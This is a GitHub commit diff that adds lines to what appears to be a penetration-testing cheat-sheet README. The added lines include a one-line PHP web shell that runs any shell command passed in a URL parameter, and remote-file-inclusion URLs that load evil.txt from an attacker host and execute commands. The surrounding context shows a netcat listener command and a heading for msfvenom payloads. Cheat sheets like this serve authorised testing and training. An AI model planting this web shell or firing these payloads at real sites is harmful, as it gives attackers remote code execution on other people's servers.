Update README.md

This commit is contained in:
Joe Totes
2022-09-27 20:09:39 -04:00
committed by GitHub
parent 3f34b25644
commit 67239f6c31

View File

@@ -1558,6 +1558,12 @@ sudo nc -lnvp {PORT}
#### NC Execute - Server [STEP 2]
```bash
# PHP webshell
<?php echo shell_exec($_GET['cmd']); ?>
page.php?page=http://{LHOST}/evil.txt&cmd={command}
page.php?file=http://{LHOST}/evil.txt&cmd={command}
# MSFVENOM Payloads
# Windows